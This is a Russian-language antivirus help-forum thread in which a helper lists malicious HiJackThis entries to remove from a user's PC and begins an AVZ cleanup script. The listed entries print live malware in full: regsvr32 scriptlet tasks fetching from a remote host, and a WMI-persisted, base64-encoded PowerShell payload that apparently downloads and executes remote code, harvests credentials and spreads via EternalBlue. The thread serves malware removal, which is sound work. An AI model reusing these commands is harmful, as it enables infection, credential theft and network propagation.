Не подключается к 445 порту со своего же компа. Я не уверен вирус это или что, проблема в том что я могу telnet localhost 445, но Не могу telnet my-ip 445. Вдруг, что-то зловредное блокирует.
Printable View
Не подключается к 445 порту со своего же компа. Я не уверен вирус это или что, проблема в том что я могу telnet localhost 445, но Не могу telnet my-ip 445. Вдруг, что-то зловредное блокирует.
Уважаемый(ая) [B]алдар[/B], спасибо за обращение на наш форум!
Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].
[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
Здравствуйте,
HiJackThis (из каталога [B]autologger[/B])[URL=http://virusinfo.info/showthread.php?t=4491&p=64376&viewfull=1#post64376]профиксить[/URL]
[CODE]
O7 - IPSec: Name: netbc (2018/09/05) - {6b0c5cb1-0da6-405d-9db6-9ff3ddac2791} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: System Log Security Check - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
O22 - Task: WindowsLogTasks - C:\Windows\system32\regsvr32.exe /u /s /i:http://update.7h4uk.com:443/antivirus.php scrobj.dll
O25 - WMI Event: [Windows Events Consumer] Windows Events Filter - Event="__InstanceModificationEvent WITHIN 5600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", powershell.exe -NoP -NonI -W Hidden -E JABwAGkAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAaQBuAGYAbwByAG0AYQB0AGkAbwBuAC4AcABpAG4AZwANAAoAJABzAGUAPQBAACgAKAAnAHUAcABkAGEAdABlAC4ANwBoADQAdQBrAC4AYwBvAG0AJwApACwAKAAnAGkAbgBmAG8ALgA3AGgANAB1AGsALgBjAG8AbQAnACkALAAoACcAMQA4ADUALgAxADIAOAAuADQAMwAuADYAMgAnACkALAAoACcAMQA5ADIALgA3ADQALgAyADQANQAuADkANwAnACkAKQANAAoAJABhAHYAZwBzACAAPQAgAEAAKAApAA0ACgAkAG4AaQBjACAAPQAgACcAdQBwAGQAYQB0AGUALgA3AGgANAB1AGsALgBjAG8AbQAnAA0ACgBmAG8AcgAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgADMAOwAkAGkAKwArACkAewANAAoACQAkAHMAdQBtACAAPQAgADAADQAKAAkAJABjAG8AdQBuAHQAIAA9ACAAMAANAAoACQBmAG8AcgAoACQAagA9ADEAOwAkAGoAIAAtAGwAZQAgADQAOwAkAGoAKwArACkAewANAAoACQAJACQAdABtAHAAIAA9ACAAKAAkAHAAaQBuAC4AcwBlAG4AZAAoACQAcwBlAFsAJABpAF0AKQApAC4AUgBvAHUAbgBkAHQAcgBpAHAAVABpAG0AZQANAAoACQAJAGkAZgAgACgAJAB0AG0AcAAgAC0AbgBlACAAMAApAHsADQAKAAkACQAJAAkAJABjAG8AdQBuAHQAIAArAD0AIAAxAA0ACgAJAAkAfQANAAoACQAJACQAcwB1AG0AIAArAD0AIAAkAHQAbQBwAA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGMAbwB1AG4AdAAgAC0AbgBlACAAMAApAHsADQAKAAkACQAJACQAYQB2AGcAcwAgACsAPQAgACQAcwB1AG0ALwAkAGMAbwB1AG4AdAANAAoACQB9AGUAbABzAGUAewANAAoACQAJAAkAJABhAHYAZwBzACAAKwA9ACAAMAANAAoACQB9AA0ACgAJAGkAZgAgACgAJABpACAALQBlAHEAIAAwACkAewANAAoACQAJAGkAZgAgACgAKAAkAGEAdgBnAHMAWwAwAF0AIAAtAGwAZQAgADMAMAAwACkAIAAtAGEAbgBkACAAKAAkAGEAdgBnAHMAWwAwAF0AIAAtAG4AZQAgADAAKQApAHsADQAKAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAwAF0ADQAKAAkACQAJAGIAcgBlAGEAawANAAoACQAJAH0ADQAKAAkAfQANAAoACQBpAGYAIAAoACQAaQAgAC0AZQBxACAAMQApAHsADQAKAAkACQBpAGYAIAAoACQAYQB2AGcAcwBbADEAXQAgAC0AbgBlACAAMAApAHsADQAKAAkACQAJAGkAZgAgACgAKAAkAGEAdgBnAHMAWwAwAF0AIAAtAGwAZQAgACQAYQB2AGcAcwBbADEAXQApACAALQBhAG4AZAAgACgAJABhAHYAZwBzAFsAMABdACAALQBuAGUAIAAwACkAKQB7AA0ACgAJAAkACQAJACQAbgBpAGMAIAA9ACAAJABzAGUAWwAwAF0ADQAKAAkACQAJAAkAYgByAGUAYQBrAA0ACgAJAAkACQB9AGUAbABzAGUAewANAAoACQAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMQBdAA0ACgAJAAkACQAJAGIAcgBlAGEAawANAAoACQAJAAkAfQANAAoACQAJAH0ADQAKAAkAfQANAAoACQBpAGYAIAAoACQAaQAgAC0AZQBxACAAMgApAHsADQAKAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMgBdACAALQBsAGUAIAAzADAAMAApACAALQBhAG4AZAAgACgAJABhAHYAZwBzAFsAMgBdACAALQBuAGUAIAAwACkAKQB7AA0ACgAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMgBdAA0ACgAJAAkACQBiAHIAZQBhAGsADQAKAAkACQB9AA0ACgAJAH0ADQAKAAkAaQBmACAAKAAkAGkAIAAtAGUAcQAgADMAKQB7AA0ACgAJAAkAaQBmACAAKAAkAGEAdgBnAHMAWwAzAF0AIAAtAG4AZQAgADAAKQB7AA0ACgAJAAkACQBpAGYAIAAoACgAJABhAHYAZwBzAFsAMgBdACAALQBsAGUAIAAkAGEAdgBnAHMAWwAzAF0AKQAgAC0AYQBuAGQAIAAoACQAYQB2AGcAcwBbADIAXQAgAC0AbgBlACAAMAApACkAewANAAoACQAJAAkACQAkAG4AaQBjACAAPQAgACQAcwBlAFsAMgBdAA0ACgAJAAkACQAJAGIAcgBlAGEAawANAAoACQAJAAkAfQBlAGwAcwBlAHsADQAKAAkACQAJAAkAJABuAGkAYwAgAD0AIAAkAHMAZQBbADMAXQANAAoACQAJAAkACQBiAHIAZQBhAGsADQAKAAkACQAJAH0ADQAKAAkACQB9AA0ACgAJAH0ADQAKAH0ADQAKACQAbgBpAGMAPQAkAG4AaQBjACsAKAAnADoAJwArACcANAA0ADMAJwApAA0ACgAkAHYAZQByAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvACQAbgBpAGMALwB2AGUAcgAuAHQAeAB0ACIAKQAuAFQAcgBpAG0AKAApAA0ACgBpAGYAKAAkAHYAZQByACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7AA0ACgAgACAAIAAgACQAdgBlAHIAXwB0AG0AcAA9ACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAHYAZQByACcAXQAuAFYAYQBsAHUAZQANAAoAIAAgACAAIABpAGYAKAAkAHYAZQByACAALQBuAGUAIAAkAHYAZQByAF8AdABtAHAAKQB7AA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGEAbgB0AGkAdgBpAHIAdQBzAC4AcABzADEAIgApAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4ADQAKACAAIAAgACAAfQANAAoAfQANAAoAJABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGQAZQBmAHUAbgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZgB1AG4AcwApACkADQAKAGkAZQB4ACAAJABkAGUAZgB1AG4ADQAKAA0ACgBHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAXwBfAEYAaQBsAHQAZQByAFQAbwBDAG8AbgBzAHUAbQBlAHIAQgBpAG4AZABpAG4AZwAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGYAaQBsAHQAZQByACAALQBuAG8AdABtAGEAdABjAGgAIAAnAFcAaQBuAGQAbwB3AHMAIABFAHYAZQBuAHQAcwAnAH0AIAB8AFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQADQAKACQAZABpAHIAcABhAHQAaAA9ACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0ACsAJwBcAHMAeQBzAHQAZQBtADMAMgAnAA0ACgBpAGYAIAAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAJABkAGkAcgBwAGEAdABoACAAKQApAHsADQAKAAkAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQADQAKAH0ADQAKAGkAZgAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAKAAkAGQAaQByAHAAYQB0AGgAKwAnAFwAbQBzAHYAYwBwADEAMgAwAC4AZABsAGwAJwApACkAKQANAAoADQAKAHsAcwBlAG4AdABmAGkAbABlACAAKAAkAGQAaQByAHAAYQB0AGgAKwAnAFwAbQBzAHYAYwBwADEAMgAwAC4AZABsAGwAJwApACAAJwB2AGMAcAAnAH0ADQAKAGkAZgAgACgAIQAoAHQAZQBzAHQALQBwAGEAdABoACAAKAAkAGQAaQByAHAAYQB0AGgAKwAnAFwAbQBzAHYAYwByADEAMgAwAC4AZABsAGwAJwApACkAKQANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwByACcAfQANAAoADQAKAFsAYQByAHIAYQB5AF0AJABwAHMAaQBkAHMAPQAgAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAgAC0AbgBhAG0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAB8AHMAbwByAHQAIABjAHAAdQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBpAGQAfQANAAoAJAB0AGMAcABjAG8AbgBuACAAPQAgAG4AZQB0AHMAdABhAHQAIAAtAGEAbgBvAHAAIAB0AGMAcAANAAoAJABlAHgAaQBzAHQAPQAkAEYAYQBsAHMAZQANAAoAaQBmACAAKAAkAHAAcwBpAGQAcwAgAC0AbgBlACAAJABuAHUAbABsACAAKQANAAoAewANAAoAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABsAGkAbgBlACAAPQAkAHQALgBzAHAAbABpAHQAKAAnACAAJwApAHwAIAA/AHsAJABfAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AZQBxACAAJABuAHUAbABsACkADQAKACAAIAAgACAAIAAgACAAIAB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAcABzAGkAZABzAFsAMABdACAALQBlAHEAIAAkAGwAaQBuAGUAWwAtADEAXQApACAALQBhAG4AZAAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIARQBTAFQAQQBCAEwASQBTAEgARQBEACIAKQAgAC0AYQBuAGQAIAAoACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA4ADAAIAAiACkAIAAtAG8AcgAgACQAdAAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAxADQANAA0ADQAIgApACkAIAApAA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABlAHgAaQBzAHQAPQAkAHQAcgB1AGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAfQANAAoAUgB1AG4ARABEAE8AUwAgACIAYwBvAGgAZQByAG4AZQBjAGUALgBlAHgAZQAiAA0ACgBLAGkAbABsAEIAbwB0ACgAJwBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQANAAoAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAoACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADMAMwAzADMAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUANQA1ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB2AGkAZAA9ACQAbABpAG4AZQBbAC0AMQBdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAGkAZAAgACQAZQB2AGkAZAAgAHwAIABzAHQAbwBwAC0AcAByAG8AYwBlAHMAcwAgAC0AZgBvAHIAYwBlAA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgBpAGYAIAAoACEAJABlAHgAaQBzAHQAIAAtAGEAbgBkACAAKAAkAHAAcwBpAGQAcwAuAGMAbwB1AG4AdAAgAC0AbABlACAAOAApACkADQAKAHsADQAKACAAIAAgACAAJABjAG0AZABtAG8AbgA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0ATgBvAFAAIAAtAE4AbwBuAEkAIAAtAFcAIABIAGkAZABkAGUAbgAgAGAAIgBgACQAbQBvAG4AIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgB1AG4AcwAnAF0ALgBWAGEAbAB1AGUAIAA7AGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABgACQAZgB1AG4AcwApACkAKQA7AEkAbgB2AG8AawBlAC0AQwBvAG0AbQBhAG4AZAAgACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIABgACQAUgBlAG0AbwB0AGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAEAAKABgACQAbQBvAG4ALAAgAGAAJABtAG8AbgAsACAAJwBWAG8AaQBkACcALAAgADAALAAgACcAJwAsACAAJwAnACkAYAAiACIADQAKACAAIAAgACAAJAB2AGIAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBDAG8AbQBPAGIAagBlAGMAdAAgAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwADQAKACAAIAAgACAAJAB2AGIAcwAuAHIAdQBuACgAJABjAG0AZABtAG8AbgAsADAAKQANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFMAeQBzAHQAZQBtAF8AQQBuAHQAaQBfAFYAaQByAHUAcwBfAEMAbwByAGUAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUADQAKACQAYQAsACAAJABOAFQATABNAD0AIABHAGUAdAAtAGMAcgBlAGQAcwAgACQAbQBpAG0AaQAgACQAbQBpAG0AaQANAAoADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEQATgBTAF0AOgA6AEcAZQB0AEgAbwBzAHQAQgB5AE4AYQBtAGUAKAAkAG4AdQBsAGwAKQAuAEEAZABkAHIAZQBzAHMATABpAHMAdAANAAoAJABpAHAAcwB1ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBTAHkAcwB0AGUAbQBfAEEAbgB0AGkAXwBWAGkAcgB1AHMAXwBDAG8AcgBlACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAMQA3ACcAXQAuAFYAYQBsAHUAZQANAAoAJABzAGMAYgBhAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQATgBlAHQAdwBvAHIAawAgAGkAbgAgACQATgBlAHQAdwBvAHIAawBzACkADQAKAHsADQAKAA0ACgAgACAAIAAgACQASQBQAEEAZABkAHIAZQBzAHMAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAQQBkAGQAcgBlAHMAcwBUAG8AUwB0AHIAaQBuAGcADQAKAAkAaQBmACAAKAAkAEkAUABBAGQAZAByAGUAcwBzACAALQBtAGEAdABjAGgAIAAnAF4AMQA2ADkALgAyADUANAAnACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAnADIANQA1AC4AMgA1ADUALgAyADUANQAuADAAJwANAAoAIAAgACAAIAAkAGkAcABzAF8AYwA9AEcAZQB0AC0AbgBlAHQAdwBvAHIAawByAGEAbgBnAGUAIAAkAEkAUABBAGQAZAByAGUAcwBzACAAJABTAHUAYgBuAGUAdABNAGEAcwBrAA0ACgAgACAAIAAgACQAaQBwAHMAXwBiAD0ARwBlAHQALQBJAHAASQBuAEIAIAAkAEkAUABBAGQAZAByAGUAcwBzAA0ACgAgACAAIAAgACQAaQBwAHMAPQAkAGkAcABzAF8AYwArACQAaQBwAHMAXwBiAA0ACgAJACQAdABjAHAAYwBvAG4AbgAgAD0AIABuAGUAdABzAHQAYQB0ACAALQBhAG4AbwBwACAAdABjAHAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoACQAJAAkACQBpAGYAIAAoACgAVABlAHMAdAAtAFAAbwByAHQAIAAkAGkAcAApACAALQBuAGUAIAAkAGYAYQBsAHMAZQAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAHIAZQA9ADAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABhAC4AYwBvAHUAbgB0ACAALQBuAGUAIAAwACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsAJAByAGUAIAA9ACAAdABlAHMAdAAtAGkAcAAgAC0AaQBwACAAJABpAHAAIAAtAGMAcgBlAGQAcwAgACQAYQAgACAALQBuAGkAYwAgACQAbgBpAGMAIAAtAG4AdABsAG0AIAAkAE4AVABMAE0AIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAcgBlACAALQBlAHEAIAAxACkAewAkAGkAcABzAHUAIAA9ACQAaQBwAHMAdQAgACsAIgAgACIAKwAkAGkAcAB9AA0ACgAJAAkACQBlAGwAcwBlAA0ACgAJAAkACQB7AA0ACgAJAAkACQAJACQAdgB1AGwAPQBbAFAAaQBuAGcAQwBhAHMAdABsAGUALgBTAGMAYQBuAG4AZQByAHMALgBtADEANwBzAGMAXQA6ADoAUwBjAGEAbgAoACQAaQBwACkADQAKAAkACQAJAAkAaQBmACAAKAAkAHYAdQBsACAALQBhAG4AZAAgACQAaQAxADcAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkADQAKAA0ACgAJAAkACQAJAHsADQAKAAkACQAJAAkACQAkAHIAZQBzAD0AZQBiADcAIAAkAGkAcAAgACQAcwBjAA0ACgAJAAkACQAJAAkAaQBmACAAKAAhACgAJAByAGUAcwAgAC0AZQBxACAAJAB0AHIAdQBlACkAKQANAAoACQAJAAkACQAJAHsAZQBiADgAIAAkAGkAcAAgACQAcwBjAH0ADQAKAAkACQAJAAkACQAkAGkAMQA3ACAAPQAgACQAaQAxADcAIAArACAAIgAgACIAKwAkAGkAcAANAAoACQAJAAkACQB9AA0ACgAJAAkACQB9AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAB9AA0ACgAgAH0ADQAKAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAUwB5AHMAdABlAG0AXwBBAG4AdABpAF8AVgBpAHIAdQBzAF8AQwBvAHIAZQAnACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUwBlAHQAUAByAG8AcABlAHIAdAB5AFYAYQBsAHUAZQAoACcAaQBwAHMAdQAnACAALAAkAGkAcABzAHUAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBQAHUAdAAoACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUwBlAHQAUAByAG8AcABlAHIAdAB5AFYAYQBsAHUAZQAoACcAaQAxADcAJwAgACwAJABpADEANwApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQA=
[/CODE]
AVZ [URL=http://virusinfo.info/showthread.php?t=7239&p=88804&viewfull=1#post88804]выполнить следующий скрипт[/URL].
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
[CODE]
begin
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
